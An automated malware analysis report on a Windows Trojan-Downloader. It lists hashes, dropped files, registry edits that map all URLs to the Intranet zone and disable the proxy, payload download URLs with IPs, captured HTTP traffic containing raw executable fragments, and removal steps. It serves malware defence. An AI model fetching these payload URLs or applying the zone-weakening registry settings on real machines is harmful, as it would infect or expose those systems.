HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Generic.14783327 (B) (Emsisoft), Trojan.Generic.14783327 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: be544a694c1caa48e6ac2df4f6421ec3
SHA1: 8a2e9233de4f4e0cd561acf3f787fa2c304f6899
SHA256: 097aad9946dae59bac73d27b63e9f809335e4ed5c370e5c7b1598b3add1d67cc
SSDeep: 12288:QhuzVyM/BisrxyEi64r/SEmUnz9KywQ7Kd21CgNbL8T:zmEijr/S1qz9K5kn
Size: 503296 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-30 18:16:46
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
uuuyunbo_53_1248.exe:1536
%original file name%.exe:652
The Trojan injects its code into the following process(es):
Setup_95101248.exe:1596
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process uuuyunbo_53_1248.exe:1536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\setup_30004.exe (1930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_30004[1].exe (4277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The process Setup_95101248.exe:1596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\XxShow\XxTongji.dll (11601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\browse.bmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\license.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\CheckEnv.dll (2236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\close.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install.bmp (4289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WebCtrl.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading1.bmp (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading2.bmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\go.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\finish.bmp (5494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step01.bmp (14661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step.bmp (15065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WndProc.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\init.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\cancel.bmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\bg.bmp (3624 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
The process %original file name%.exe:652 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Setup_95101248.exe (7386 bytes)
C:\uuuyunbo_53_1248.exe (7386 bytes)
Registry activity
The process uuuyunbo_53_1248.exe:1536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C EA D3 A1 DC 1D 84 10 AF 4C 78 AE 5C 53 D0 AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Setup_95101248.exe:1596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 48 E5 57 5E C5 41 D8 3B 33 2B DA A0 C2 68 43"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process %original file name%.exe:652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 2A 76 C5 6A 1D A5 78 16 E0 F3 B3 3E E5 E9 2B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
f453688934086e01ed59d73ccfcd2c04 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\XxShow\XxTongji.dll |
33ec04738007e665059cf40bc0f0c22b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\BgWorker.dll |
4e09ca0312aeaa4029d5cd50cb99871a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\CheckEnv.dll |
e4ec95271ff1bcebab49bdfed6817a22 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\SkinBtn.dll |
00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\System.dll |
418a34a689d5f9bb85fc951168749edb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\WebCtrl.dll |
f0cb331dd4bd92a6ebce45e7cd1cf5ef | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\WndProc.dll |
ab73c0c2a23f913eabdc4cb24b75cbad | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx2.tmp\nsDialogs.dll |
0a004e3415d3d4621b427d68650e3679 | c:\Setup_95101248.exe |
728d0bcfaf8ce89b1983bbd7891cf9f8 | c:\uuuyunbo_53_1248.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
uuuyunbo_53_1248.exe:1536
%original file name%.exe:652 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files%\setup_30004.exe (1930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\setup_30004[1].exe (4277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\XxShow\XxTongji.dll (11601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\browse.bmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\license.txt (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\CheckEnv.dll (2236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\close.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install.bmp (4289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WebCtrl.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading1.bmp (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\loading2.bmp (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\go.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\finish.bmp (5494 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step01.bmp (14661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\install_step.bmp (15065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\WndProc.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\init.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\cancel.bmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\bg.bmp (3624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Setup_95101248.exe (7386 bytes)
C:\uuuyunbo_53_1248.exe (7386 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name: ?????
Product Version: 1.0.0.0
Legal Copyright: ?????? ????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????
Comments: ??????????(http://www.eyuyan.com)
Language: English (United Kingdom)
Company Name: Product Name: ?????Product Version: 1.0.0.0Legal Copyright: ?????? ????????Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: ?????Comments: ??????????(http://www.eyuyan.com)Language: English (United Kingdom)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 520192 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 524288 | 430080 | 428032 | 5.37247 | e771329ce39b039ce5a1146ac018b9ec |
.rsrc | 954368 | 77824 | 74240 | 4.59261 | 0bcbc538b675834e4553c6070205a4c5 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://bgp5.yandui.com/xlxc/Setup_95101248.exe | |
hxxp://d.juezhao123.com/setup/setup_30004.exe | 58.222.24.189 |
hxxp://down.shm520.com/xlxc/Setup_95101248.exe | 183.131.193.67 |
xiazai.lianmengqudao1.com | 58.220.3.155 |
down.shijiakai.net | 58.220.21.68 |
www.jiuhuabuy.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /setup/setup_30004.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.juezhao123.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 14 Aug 2015 19:34:12 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sat, 08 Aug 2015 12:04:05 GMT
ETag: "409d8-9da10-51ccb8c913a21"
Accept-Ranges: bytes
Content-Length: 645648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....oS.................\...........2.......p....@..........................................................................s...........'..............h'...........................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc....'.......(...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....6B..H.P.u..u..u....r@..B...SV.5.6B..E.WP.u....r@..e...E..E.P.u....r@..}..e....Lp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Tp@..E...E.P.E.P.u....r@..u....E..9}...w....~X.te.v4..Dp@....E.tU.}.j.W.E......E.......@p@..vXW..Hp@..u..5<p@.W...E..E.h ...Pj.h..B.W...r@..u.W...u....E.P.u...\r@._^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>
GET /xlxc/Setup_95101248.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: down.shm520.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Aug 2015 11:44:19 GMT
Content-Type: application/octet-stream
Content-Length: 1363160
Last-Modified: Wed, 29 Jul 2015 19:29:18 GMT
Connection: keep-alive
ETag: "55b9298e-14ccd8"
X-Server-IP: 183.131.193.67
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....:J.................\..........!1.......p....@..........................0...............................................s....... ..................@............................................................p...............................text...8Z.......\.................. ..`.rdata.......p.......`..............@..@.data...X............r..............@....ndata.......@...........................rsrc........ .......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h>B..H.P.u..u..u...Hr@..X...SV.5p>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e..9}...Dp@........FP.VT........ M............U....M....3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...e....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Setup_95101248.exe_1596:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
... %d%%
... %d%%
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\nsDialogs.dll
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp\nsDialogs.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx2.tmp
`.reloc
`.reloc
KERNEL32.DLL
KERNEL32.DLL
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
BgWorker.dll
BgWorker.dll
GetProcessHeap
GetProcessHeap
comdlg32.dll
comdlg32.dll
nsDialogs.dll
nsDialogs.dll
All Files|*.*
All Files|*.*
Thawte Certification1
Thawte Certification1
hXXp://ocsp.thawte.com0
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
#hXXp://logo.verisign.com/vslogo.gif0
#hXXp://logo.verisign.com/vslogo.gif0
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
hXXp://ocsp.verisign.com0
Could not resolve %s: %s; %s
Could not resolve %s: %s; %s
%s:%d
%s:%d
Added %s:%d:%s to DNS cache
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
Resolve %s found illegal!
%5[^:]:%d:%5s
%5[^:]:%d:%5s
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
CURLOPT_SSL_VERIFYHOST no longer supports 1 as value!
Connected to %s (%s) port %ld (#%ld)
Connected to %s (%s) port %ld (#%ld)
User-Agent: %s
User-Agent: %s
About to connect() to %s%s port %ld (#%ld)
About to connect() to %s%s port %ld (#%ld)
Re-using existing connection! (#%ld) with host %s
Re-using existing connection! (#%ld) with host %s
%s://%s
%s://%s
IDN support not present, can't parse Unicode domains
IDN support not present, can't parse Unicode domains
malformed
malformed
:]://%[^
:]://%[^
[^:]:%[^
[^:]:%[^
Protocol %s not supported or disabled in libcurl
Protocol %s not supported or disabled in libcurl
http_proxy
http_proxy
%5[^:@]:%5[^@]
%5[^:@]:%5[^@]
:%5[^@]
:%5[^@]
Port number too large: %lu
Port number too large: %lu
%s://%s%s%s:%hu%s%s%s
%s://%s%s%s:%hu%s%s%s
;type=%c
;type=%c
[%*45[0123456789abcdefABCDEF:.]%c
[%*45[0123456789abcdefABCDEF:.]%c
Couldn't find host %s in the _netrc file; using defaults
Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Couldn't resolve proxy '%s'
Connection #%ld to host %s left intact
Connection #%ld to host %s left intact
operation aborted by callback
operation aborted by callback
ioctl callback returned error %d
ioctl callback returned error %d
the ioctl callback returned %d
the ioctl callback returned %d
seek callback returned error %d
seek callback returned error %d
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Problem (%d) in the Chunked-Encoded data
Problem (%d) in the Chunked-Encoded data
HTTP server doesn't seem to support byte ranges. Cannot resume.
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
No URL set!
No URL set!
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Disables POST, goes with %s
Issue another request to this URL: '%s'
Issue another request to this URL: '%s'
[^?&/:]://%c
[^?&/:]://%c
unspecified error %d
unspecified error %d
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
#HttpOnly_
skipped cookie with bad tailmatch domain: %s
skipped cookie with bad tailmatch domain: %s
skipped cookie with illegal dotcount domain: %s
skipped cookie with illegal dotcount domain: %s
httponly
httponly
23[^;
23[^;
=]=I99[^;
=]=I99[^;
%s%s%s
%s%s%s
WARNING: failed to save cookies in %s
WARNING: failed to save cookies in %s
# Fatal libcurl error
# Fatal libcurl error
# Netscape HTTP Cookie File
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/docs/http-cookies.html
# hXXp://curl.haxx.se/docs/http-cookies.html
